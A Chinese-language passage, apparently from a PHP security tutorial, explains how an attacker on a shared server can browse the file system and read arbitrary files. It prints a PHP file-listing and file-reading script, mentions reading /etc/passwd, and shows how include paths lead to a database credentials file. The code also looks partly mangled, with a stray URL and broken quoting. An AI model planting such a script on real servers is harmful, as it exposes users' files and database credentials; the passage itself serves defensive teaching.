除了能在共享服務(wù)器上讀取任意文件之外，攻擊者還能建立一個(gè)可以瀏覽文件系統(tǒng)的腳本。由于你的大多數(shù)敏感文件不會(huì)保存在網(wǎng)站主目錄下，此類腳本一般用于找到你的源文件的所在位置。請(qǐng)看下例：

<pre>

<?php

if (isset($_GET[’dir’]))

{

ls($_GET[’dir’]);

}

elseif (isset($_GET[’file’]))

{

cat($_GET[’file’]);

}

else

{

ls(’/’);

}

function cat($file)

{

echo htmlentities(file_get_contents($file), ENT_QUOTES, ’UTF-8’));

}

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize('$dir$filename');

if (is_dir('$dir$filename'))

{

$type = ’dir’;

$filename .= ’/’;

}

else

{

$type = ’file’;

}

if (is_readable('$dir$filename'))

{

$line = str_pad($size, 15);

$line .= '<a href='http://www.lshqa.cn/bcjs/{$_SERVER[’PHP_SELF’]}';

$line .= '?$type=$dir$filename'>$filename</a>';

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

echo '$linen';

}

$handle->close();

}

?>

</pre>

攻擊者可能會(huì)首先察看/etc/passwd文件或/home目錄以取得該服務(wù)器上的用戶名清單；可以通過(guò)語(yǔ)言的結(jié)構(gòu)如include或require來(lái)發(fā)現(xiàn)保存在網(wǎng)站主目錄以外的源文件所在位置。例如，考慮一下下面的腳本文件/home/victim/public_html/admin.php：

<?php

include ’../inc/db.inc’;

/* ... */

?>

如果攻擊者設(shè)法顯示了該文件的源碼，就可以發(fā)現(xiàn)db.inc的所在位置，同時(shí)他可以使用readfile()函數(shù)來(lái)使其內(nèi)容暴露，取得了數(shù)據(jù)庫(kù)的訪問(wèn)權(quán)限。這樣，在這個(gè)環(huán)境中保存db.inc于網(wǎng)站主目錄之外的做法并未起到保護(hù)作用。

這一攻擊說(shuō)明了為什么要把共享服務(wù)器上的所有源文件看成是公開(kāi)的，并要選擇數(shù)據(jù)庫(kù)實(shí)現(xiàn)所有敏感數(shù)據(jù)的保存。